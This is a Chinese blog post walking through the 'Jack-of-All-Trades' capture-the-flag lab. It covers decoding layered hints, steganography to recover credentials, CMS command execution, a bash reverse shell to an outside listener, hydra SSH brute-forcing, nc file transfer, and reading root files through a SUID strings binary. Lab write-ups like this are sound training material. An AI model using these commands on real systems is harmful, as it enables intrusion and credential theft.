当前位置：首页 > news >正文

Jack-of-All-Trades

news 2025/9/16 20:05:16

Jack-of-All-Trades

一、信息收集

先使用nmap扫一下Ip看看开放了哪些端口，这里很奇怪，22端口上面却是部署着http协议，看了一下wp这里要使用浏览器绕过这个限制

nmap -sS -A -Pn 10.10.196.165

这里使用firefox，在导航栏里面搜索about config然后再出来的搜索框这里再搜索network.security.ports.banned.override在某些 Firefox 版本中，这可能会显示无结果（在这种情况下，在页面上右键单击任何位置，选择 new -> String 并将搜索查询用作首选项名称）——在其他版本中，它将显示与我相同的内容

选择字符串后，然后添加上22

接着再刷新页面就能成功访问了

这里使用dirsearch扫一下这个ip看看有什么文件，这里记得要加22端口

python3 dirsearch.py -u http://10.10.196.165:22 -e php,html,txt -t 50 -x 403,401

只有一个assets访问一下里面有什么

二、渗透利用

三张图片和一个css文件看看css文件里面有什么

这个css点开什么都没有，下手点只能是那几个图片了，先放着我忘记站点的源文件有什么了

回到首页右键源代码，这里给我了一段提示有一个 隐藏功能页面 /recovery.php，并且下面还给了我一段编码后的的文字，看起来是base64编码，

UmVtZW1iZXIgdG8gd2lzaCBKb2hueSBHcmF2ZXMgd2VsbCB3aXRoIGhpcyBjcnlwdG8gam9iaHVudGluZyEgSGlzIGVuY29kaW5nIHN5c3RlbXMgYXJlIGFtYXppbmchIEFsc28gZ290dGEgcmVtZW1iZXIgeW91ciBwYXNzd29yZDogdT9XdEtTcmFxCg==

将这段base64编码解密后又给了我一段提示，给了我们一个密码u?WtKSraq现在我们先访问一下给我们的那个隐藏的php目录

这里告诉我们当前用户名为Jack根据上面那个base64编码给我们的密码尝试这登录一下，发现有点不对劲，因为输入账户密码后页面加载了一下，就没反应了，也不显示账户或者密码报错，就只是加载了一下。抓包看看

这里抓包发包后又有一段隐藏的文字看起来又是base64编码解密一下

这里拿到kali里面解码一下，发现乱码了。说明这里虽然是base64编码，但是解码之后得到的是不纯的文本，而是二进制文件，所以这里要将解码后保存成文件才行

echo "GQ2TOMRXME3TEN3BGZTDOMRWGUZDANRXG42TMZJWG4ZDANRXG42TOMRSGA3TANRVG4ZDOMJXGI3DCNRXG43DMZJXHE3DMMRQGY3TMMRSGA3DONZVG4ZDEMBWGU3TENZQGYZDMOJXGI3DKNTDGIYDOOJWGI3TINZWGYYTEMBWMU3DKNZSGIYDONJXGY3TCNZRG4ZDMMJSGA3DENRRGIYDMNZXGU3TEMRQG42TMMRXME3TENRTGZSTONBXGIZDCMRQGU3DEMBXHA3DCNRSGZQTEMBXGU3DENTBGIYDOMZWGI3DKNZUG4ZDMNZXGM3DQNZZGIYDMYZWGI3DQMRQGZSTMNJXGIZGGMRQGY3DMMRSGA3TKNZSGY2TOMRSG43DMMRQGZSTEMBXGU3TMNRRGY3TGYJSGA3GMNZWGY3TEZJXHE3GGMTGGMZDINZWHE2GGNBUGMZDINQ=" | base64 -d > decoded.bin

查看一下文件类型，发现还是报错，可能这并不是base64编码

我问了一下ai，ai'提示我说这里可能是base32编码，我尝试着解码一下

这里给了我一段编码，看起来像16进制

45727a727a6f72652067756e67206775722070657271726167766e79662067622067757220657270626972656c207962747661206e657220757671717261206261206775722075627a72636e7472212056207861626a2075626a20736265747267736879206c6268206e65722c20666220757265722766206e20757661673a206f76672e796c2f3247694c443246

使用python脚本对这里解码一下

hex_data = "45727a727a6f72652067756e67206775722070657271726167766e79662067622067757220657270626972656c207962747661206e657220757671717261206261206775722075627a72636e7472212056207861626a2075626a20736265747267736879206c6268206e65722c20666220757265722766206e20757661673a206f76672e796c2f3247694c443246"
text = bytes.fromhex(hex_data).decode('utf-8', errors='ignore')
print(text)

解密后的结果看不懂,丢ai问了一下这是ROT13加密的文本

Erzzore gung gur perqragvnyf gb gur erpbirel ybtva ner uvqra ba gur ubzrcntq! V xabj ubj sbetrgshy lbh ner, fb uref'n n uvag: ovg.yl/2GiLD2F

再使用脚本对ROT13解码

import codecs
rot13_text = codecs.decode(text, 'rot_13')
print(rot13_text)

解码后给了我们一个提示
- 记住，恢复登录的凭证隐藏在主页上！我知道你有多直接，所以这里有个提示：bit.ly/2TiYQ2S

Remember that the credentials to the recovery login are hidden on the homepage!
I know how forwardly you are, so here's a hint: bit.ly/2TiYQ2S

短链接直接访问失效了，还是得从主页下手，f12开发者工具栏，在head标签第一个style样式里面发现了编码

background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADgAAAA4CAMAAACfWMssAAAAtFBMVEUAAAD////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////oK74hAAAAPHRSTlMABBMIDyQXHwyBfFdDMSw+OjXCb+5RG51IvV/k0rOqlGRM6KKMhdvNyZBz9MaupmxpWyj437iYd/yJVNZeuUC7AAACt0lEQVRIx53T2XKiUBCA4QYOiyCbiAsuuGBcYtxiYtT3f6/pbqoYHVFO5r+iivpo6DpAWYpqeoFfr9f90DsYAuRSWkFnPO50OgR9PwiCUFcl2GEcx+N/YBh6pvKaefHlUgZd1zVe0NbYcQjGBfzrPE8Xz8aF+71D8gG6DHFPpc4a7xFiCDuhaWgKgGIJQ3d5IMGDrpS4S5KgpIm+en9f6PlAhKby4JwEIxlYJV9h5k5nee9GoxHJ2IDSNB0dwdad1NAxDJ/uXDHYmebdk4PdbkS58CIVHdYSUHTYYRWOJblWSyu2lmy3KNFVJNBhxcuGW4YBVCbYGRZwIooipHsNqjM4FbgOQqQqSKQQU9V8xmi1QlgHqQQ6DDBvRUVCDirs+EzGDGOQTCATgtYTnbCVLgsVgRE0T1QE0qHCFAht2z6dLvJQs3Lo2FQoDxWNUiBhaP4eRgwNkI+dAjVOA/kUrIDwf3CG8NfNOE0eiFotSuo+rBiq8tD9oY4Qzc6YJw99hl1wzpQvD7ef2M8QgnOGJfJw+EltQc+oX2yn907QB22WZcvlUpd143dqQu+8pCJZuGE4xCuPXJqqcs5sNpsI93Rmzym1k4Npk+oD1SH3/a3LOK/JpUBpWfqNySxWzCfNCUITuDG5dtuphrUJ1myeIE9bIsPiKrfqTai5WZxbhtNphYx6GEIHihyGFTI69lje/rxajdh0s0msZ0zYxyPLhYCb1CyHm9Qsd2H37Y3lugVwL9kNh8Ot8cha6fUNQ8nuXi5z9/ExsAO4zQrb/ev1yrCB7lGyQzgYDGuxq1toDN/JGvN+HyWNHKB7zEoK+PX11e12G431erGYzwmytAWU56fkMHY5JJnDRR2eZji3AwtIcrEV8Cojat/BdQ7XOwGV1e1hDjGGjXbdArm8uJZtCH5MbcctVX8A1WpqumJHwckAAAAASUVORK5CYII=");

data:image/png;base64,... 表示这是一张 PNG 图片的 Base64 编码把这个 Base64 解码成 PNG 图片文件，然后查看图片内容,注意把 iVBOR... 后面的完整 Base64 数据都保存进去

echo "iVBORw0KGgoAAAANSUhEUgAAADgAAAA4CAMAAACfWMssAAAAtFBMVEUAAAD////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////oK74hAAAAPHRSTlMABBMIDyQXHwyBfFdDMSw+OjXCb+5RG51IvV/k0rOqlGRM6KKMhdvNyZBz9MaupmxpWyj437iYd/yJVNZeuUC7AAACt0lEQVRIx53T2XKiUBCA4QYOiyCbiAsuuGBcYtxiYtT3f6/pbqoYHVFO5r+iivpo6DpAWYpqeoFfr9f90DsYAuRSWkFnPO50OgR9PwiCUFcl2GEcx+N/YBh6pvKaefHlUgZd1zVe0NbYcQjGBfzrPE8Xz8aF+71D8gG6DHFPpc4a7xFiCDuhaWgKgGIJQ3d5IMGDrpS4S5KgpIm+en9f6PlAhKby4JwEIxlYJV9h5k5nee9GoxHJ2IDSNB0dwdad1NAxDJ/uXDHYmebdk4PdbkS58CIVHdYSUHTYYRWOJblWSyu2lmy3KNFVJNBhxcuGW4YBVCbYGRZwIooipHsNqjM4FbgOQqQqSKQQU9V8xmi1QlgHqQQ6DDBvRUVCDirs+EzGDGOQTCATgtYTnbCVLgsVgRE0T1QE0qHCFAht2z6dLvJQs3Lo2FQoDxWNUiBhaP4eRgwNkI+dAjVOA/kUrIDwf3CG8NfNOE0eiFotSuo+rBiq8tD9oY4Qzc6YJw99hl1wzpQvD7ef2M8QgnOGJfJw+EltQc+oX2yn907QB22WZcvlUpd143dqQu+8pCJZuGE4xCuPXJqqcs5sNpsI93Rmzym1k4Npk+oD1SH3/a3LOK/JpUBpWfqNySxWzCfNCUITuDG5dtuphrUJ1myeIE9bIsPiKrfqTai5WZxbhtNphYx6GEIHihyGFTI69lje/rxajdh0s0msZ0zYxyPLhYCb1CyHm9Qsd2H37Y3lugVwL9kNh8Ot8cha6fUNQ8nuXi5z9/ExsAO4zQrb/ev1yrCB7lGyQzgYDGuxq1toDN/JGvN+HyWNHKB7zEoK+PX11e12G431erGYzwmytAWU56fkMHY5JJnDRR2eZji3AwtIcrEV8Cojat/BdQ7XOwGV1e1hDjGGjXbdArm8uJZtCH5MbcctVX8A1WpqumJHwckAAAAASUVORK5CYII=" > img.b64

解码PNG图片

base64 -d img.b64 > img.png

查看图片

xdg-open img.png

还是报错这里看了一下wp原本那个短链接是能访问的我这里访问报错，访问短链接后会给一个对剑齿龙的维基百科，这里赫然醒目这Stegosauria这几个字，配合这前的assets目录下载看看有什么东西

把文件全下载到本地

使用命令查看这里提示我们要使用密码，我们使用jack的密码u?WtKSraq,对其中两个文件分别查看，告诉我们了一个creds.txt和cms.creds 这里查看creds.txt告诉我们文件错了但是方向是对的，那么我们查看cms.creds看看

好耶，给了我们一个账户和密码登录看看

Username: jackinthebox
Password: TplFxiSHjY

这里已经很明显提示我们了，这里有RCE命令执行

三、内网渗透

看看当前用户，写一个反弹的shell进去，在kali启动监听端口，拿到shell

bash -c 'bash -i >& /dev/tcp/10.17.35.134/4444 0>&1'
URL编码：bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.17.35.134%2F4444%200%3E%261%27

在翻阅目录的过程中发现了在home目录下面有关于jack的密码

将jack的密码保存在本地上面，使用九头蛇对ssh服务进爆破,拿到jack的密码ITMJpGGIqg1jn?>@

hydra -l jack -P <path-to-copied-passwords> -s 80 ssh://<remote-ip>

现在使用ssh进行连接,这下面有个图片

ssh -p 80 jack@10.10.120.43

查看一下靶机上面是否有安装nc

nc -h

使用nc将图片传输到我们的kali上面使用默认查看器查看图片,也是看到了我们想要的东西

靶机: nc IP 4444 < user.jpg
KALI:nc -lvnp 4444 > user.jpg
xdg-open user.jpg

四、提权

这里我想查看能以root身份启动的命令和计划任务都没有可以利用的地方，那么看看SUID文件

最值得马上试的是 /usr/bin/strings（setuid root） —— 这是不常见且很有价值的“直接读 root 只读文件”的途径。你可以用它读取 /etc/shadow 等通常只有 root 能读的文件，我们可以利用这个直接拿到我们想要的东西

find / -perm -4000 -type f 2>/dev/null

直接使用string读取位于根目录下面的root.txt

/usr/bin/strings /root/root.txt

查看全文

http://www.wxhsa.cn/company.asp?id=1879

Matlab的交通标志定位实现

怎样在 Salesforce Flow 中获取当前 Salesforce 组织的 URL

reLeetCode 热题 100-3 最长连续序列扩展排序算法 - MKT

vuejs3.0 从入门到精通【左扬精讲】—— 从原生到原子化：一文梳理现代 CSS 技术体系（2025 版）

java中JSON字符串处理的踩坑

11111

阿里云微服务引擎 MSE 及 API 网关 2025 年 8 月产品动态

TIA Portal中S7-1500F CPU与ET200SP安全模块的配置例程（转载）

获取第一个运行的Word应用程序实例

S7-1500 TRACE功能组态（转载）

如何在Proxmox VE中使用fdisk命令行扩展LVM存储池 - 若

垃圾AV覆盖defender

SAP-PO:怎么控制传输的内容在单数据情况下是数组格式还是单对象格式

开源新基建：数字中国创新发展的底层密码与生态实践

员工离职停用Salesforce帐号？这11个“坑”千万别踩！

Linux的运行模式

Spring Boot + MybatisX，效率翻倍！

条码控件Aspose.BarCode教程：使用 Java 自动生成 DotCode 条形码

AI 玩转网页自动化无压力：基于函数计算 FC 构建 Browser Tool Sandbox

AI时代的全栈框架：独立开发者的机会与挑战

创建逻辑卷

Server 13 ，CentOS 上使用 Nginx 部署多个前端项目完整指南（协助多端口与脚本自动化）

洛谷P2490 [SDOI2011] 黑白棋

WGCLOUD的告警日志在哪儿存贮的？

传统软件部署的痛点

HarmonyOS 5分布式数据管理初探：实现跨设备数据同步

qoj965 Trade

复盘我的第一个大模型Agent：从核心循环到模块化架构的演进之路

Linux内核不使用bear如何快速生成compile_commands.json使用vscode阅读源码

Docker 容器化

Jack-of-All-Trades

一、信息收集

二、渗透利用

三、内网渗透

四、提权

相关文章：